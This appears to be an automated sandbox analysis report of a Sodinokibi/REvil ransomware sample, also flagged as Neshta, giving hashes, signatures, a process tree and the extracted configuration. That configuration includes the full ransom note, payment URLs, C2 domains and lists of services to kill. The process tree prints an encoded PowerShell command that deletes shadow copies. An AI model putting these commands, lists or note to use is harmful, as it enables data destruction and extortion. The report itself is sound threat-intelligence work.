Overview

overview

10

Static

static

10

755a0472f6...83.exe

windows7_x64

10

755a0472f6...83.exe

windows10_x64

10

Analysis

  • max time kernel
    156s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 01:48

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    755a0472f68988a0cfd0601131cc3531d64f32605b60e7a4294419c5fceb8783.exe

  • Size

    155KB

  • MD5

    5aeb6c929b8f95fafd895c181ca47c1e

  • SHA1

    6b3edfc8dbfb1c7726b38e62a01e209b670e6f6f

  • SHA256

    755a0472f68988a0cfd0601131cc3531d64f32605b60e7a4294419c5fceb8783

  • SHA512

    655d18424864e0a997be068b12b8d655a2e3c76218ef2dcd54b0d4191273cb6e5be09fbc076be2dff19f068fb24ed703b6a3695e0edc0ee99fe53e9fb33588fa

Score
10/10
neshtasodinokibi$2a$10$xbydz5ujztckimolq1qy5.egdrsymjkmdaouedygug3pvckgiwwde4117persistenceransomwarespywarestealer

Malware Config

Extracted

Path

C:\n6r5q-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension n6r5q. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/BE3F02C434D9EAD0 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/BE3F02C434D9EAD0 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 4keIhjyBjMDDNet7TpbwYOG0UrbKXVY5+xuOuMNfTZRZeUOrFwCa0I6MzIFyMSRR h6MIcb8sLG12H6ltU7cq4cRzD/WL23mZUDNNjf/a3Q1ji18NVLbj74Kh/uEcgE48 4RTyg7TgrvMt/EM/b0KW1VFrOm/1f3PN9VbSwBUX4sFWyzOCFbVJmqaK0R0b62wx zJcTPY10cFpCFDIE8DcCgx/we+MIQJu88/NNrPdN5RGqef+HjV+m+JhJA1l8HFz+ DMrQ0qihjrM55T6OwMuE4quuQRKsnlj3biHZxqKcbQ1LqPoX5FVMTn6yrhwRn+Vd HUnYMVSgQrvQosDpdBAZLsQyqwzLWE2sP5NmLYJM4SBx4brs4KqA3Xv8h8B/Zz3y q8Js03zDoTDaJKoGlHWCU7EMGe+43qug3uBHDU1c9OR7Tdn8ek5NNH6GedEmkc3t YJ9fTRlda4c6yX4sh5NjiJ48r9yHjh9RIUuPKTmKcBW+tAY3UG+Srr3bPmVKTNUW qr33ZjzIBgWlr9IcdkJi04GmkWHNZxNEvjGjkvDTBoe/N5P0hR156ATcB1cbs8Nh St1CMXYq71J9OHTGUGcXpG+VH71BqE1YsP3tXZgzZESWey3x0Wn+on88JwXjZGbH JuU54cKThS7gHRlIlYFjDkAWnqTfnVz5/rQv8a+OJrSPjEfx006FUML9hgip61y8 H/4dH09YQ2tK9Tar8nVRFWx9eml5D3Qyqax2Yki8X6/qRH0ALgp8+RuuW5Sm0bcb hKXMrkWmQIocmI7k8GhSNN7FEAfyTAZqZCT6ZOUZ8ZGmde6idIHY49OpVFdHL01h 1qw91eOCr3tfXTupnXrO4mEFBJvUpyUoRwQlofw3KgUR9CDt4VQLzTVuO9KH+LOL 3nGeOaGQjOsHsNOIBy02Dq3VkUsN7DdslD7/edlHl19iPE6E1auZTBJ97CBpoldc 90DY2O9UJ9LaKnoDGD1QbKwA31MIMyXu1KMpQ6jw9nOP0UJrKrwhbk1NOjUGcyQW VE8o+QDZyMMs0nFRAMGEaacGHM/LUkHXoS9tEGF5k+QP0VKwSHtYfUDrJJc9/l8g QFJ8TwXzLOu+mHIyH7cFzCRx7BXlj4HsYpnAEy8Xpr6ALFNBy1U9RMf7CHfrDgw+ 32X3o4pmNlHQuP7lZBuFRLxHVttN7/h9mY4kXMhrp8vtvWy4oifx7RWKM5JUCqiP aOfz/SdPBGCOVkjxyMI7sUV9kwQWvm5fib0rdS4u1YS6+XhzFXUDEvs1IrctFacX 72i/xJvkO1aiTw8lyUbPYncX1lRl/w== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/BE3F02C434D9EAD0

http://decryptor.cc/BE3F02C434D9EAD0

Extracted

Family

sodinokibi

Botnet

$2a$10$XBYdz5uJZTckimoLq1qY5.eGDrSYmjkMdaoUedYguG3PvckgIWWde

Campaign

4117

C2

miraclediet.fun

austinlchurch.com

i-trust.dk

cheminpsy.fr

aselbermachen.com

servicegsm.net

todocaracoles.com

travelffeine.com

katketytaanet.fi

lloydconstruction.com

uranus.nl

rhinosfootballacademy.com

notmissingout.com

cerebralforce.net

higadograsoweb.com

ncid.bc.ca

edv-live.de

pierrehale.com

grupocarvalhoerodrigues.com.br

yamalevents.com
Attributes
  • net

    true

  • pid

    $2a$10$XBYdz5uJZTckimoLq1qY5.eGDrSYmjkMdaoUedYguG3PvckgIWWde

  • prc

    msaccess

    dbeng50

    tbirdconfig

    infopath

    synctime

    encsvc

    thebat

    sqbcoreservice

    oracle

    onenote

    wordpad

    mspub

    thunderbird

    steam

    mydesktopqos

    ocomm

    dbsnmp

    excel

    sql

    winword

    xfssvccon

    firefox

    mydesktopservice

    ocssd

    ocautoupds

    outlook

    agntsvc

    isqlplussvc

    visio

    powerpnt

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    4117

  • svc

    mepocs

    memtas

    sql

    vss

    backup

    sophos

    svc$

    veeam

Signatures

  • Modifies system executable filetype association 2 TTPs 1 IoCs
    persistence
  • Neshta

    Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.

    persistencespywareneshta
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Executes dropped EXE 1 IoCs
  • Modifies extensions of user files 7 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\755a0472f68988a0cfd0601131cc3531d64f32605b60e7a4294419c5fceb8783.exe
    "C:\Users\Admin\AppData\Local\Temp\755a0472f68988a0cfd0601131cc3531d64f32605b60e7a4294419c5fceb8783.exe"
    1⤵
    • Modifies system executable filetype association
    • Loads dropped DLL
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:612
    • C:\Users\Admin\AppData\Local\Temp\3582-490\755a0472f68988a0cfd0601131cc3531d64f32605b60e7a4294419c5fceb8783.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\755a0472f68988a0cfd0601131cc3531d64f32605b60e7a4294419c5fceb8783.exe"
      2⤵
      • Executes dropped EXE
      • Modifies extensions of user files
      • Adds Run key to start application
      • Enumerates connected drives
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:280
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:548
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:740
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1496

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\3582-490\755a0472f68988a0cfd0601131cc3531d64f32605b60e7a4294419c5fceb8783.exe
      MD5

      908d52413f165f7d4a256b9627b5460c

      SHA1

      3cf4f5aae4b6099be5c34f3b5125835edc2eef1c

      SHA256

      448ca440a1930e89b04ad4a44cfab6f58165b778a22150efdcfb9aaad0d8d1a6

      SHA512

      f9411ac23ebd05fc863b2293b3470b2d394a1f758c6eac0867f68aa84e10d3b34b88dc99674cf009e8899cbb680ad328b86202c9fc52a6e5f543e36235dabdbc

      Download Submit

    • \PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE
      MD5

      9e2b9928c89a9d0da1d3e8f4bd96afa7

      SHA1

      ec66cda99f44b62470c6930e5afda061579cde35

      SHA256

      8899b4ed3446b7d55b54defbc1acb7c5392a4b3bc8ec2cdc7c31171708965043

      SHA512

      2ca5ad1d0e12a8049de885b90b7f56fe77c868e0d6dae4ec4b6f3bc0bf7b2e73295cc9b1328c2b45357ffb0d7804622ab3f91a56140b098e93b691032d508156

      Download Submit

    • \Users\Admin\AppData\Local\Temp\3582-490\755a0472f68988a0cfd0601131cc3531d64f32605b60e7a4294419c5fceb8783.exe
      MD5

      908d52413f165f7d4a256b9627b5460c

      SHA1

      3cf4f5aae4b6099be5c34f3b5125835edc2eef1c

      SHA256

      448ca440a1930e89b04ad4a44cfab6f58165b778a22150efdcfb9aaad0d8d1a6

      SHA512

      f9411ac23ebd05fc863b2293b3470b2d394a1f758c6eac0867f68aa84e10d3b34b88dc99674cf009e8899cbb680ad328b86202c9fc52a6e5f543e36235dabdbc

      Download Submit

    • \Users\Admin\AppData\Local\Temp\3582-490\755a0472f68988a0cfd0601131cc3531d64f32605b60e7a4294419c5fceb8783.exe
      MD5

      908d52413f165f7d4a256b9627b5460c

      SHA1

      3cf4f5aae4b6099be5c34f3b5125835edc2eef1c

      SHA256

      448ca440a1930e89b04ad4a44cfab6f58165b778a22150efdcfb9aaad0d8d1a6

      SHA512

      f9411ac23ebd05fc863b2293b3470b2d394a1f758c6eac0867f68aa84e10d3b34b88dc99674cf009e8899cbb680ad328b86202c9fc52a6e5f543e36235dabdbc

      Download Submit

    • memory/548-60-0x000007FEFB5D1000-0x000007FEFB5D3000-memory.dmp

      Filesize

      8KB

      Download

    • memory/548-62-0x0000000002760000-0x0000000002762000-memory.dmp

      Filesize

      8KB

      Download

    • memory/548-63-0x0000000002762000-0x0000000002764000-memory.dmp

      Filesize

      8KB

      Download

    • memory/548-64-0x0000000002764000-0x0000000002767000-memory.dmp

      Filesize

      12KB

      Download

    • memory/548-61-0x000007FEF26A0000-0x000007FEF31FD000-memory.dmp

      Filesize

      11.4MB

      Download

    • memory/548-65-0x000000001B880000-0x000000001BB7F000-memory.dmp

      Filesize

      3.0MB

      Download

    • memory/548-66-0x000000000276B000-0x000000000278A000-memory.dmp

      Filesize

      124KB

      Download

    • memory/612-55-0x0000000075D61000-0x0000000075D63000-memory.dmp

      Filesize

      8KB

      Download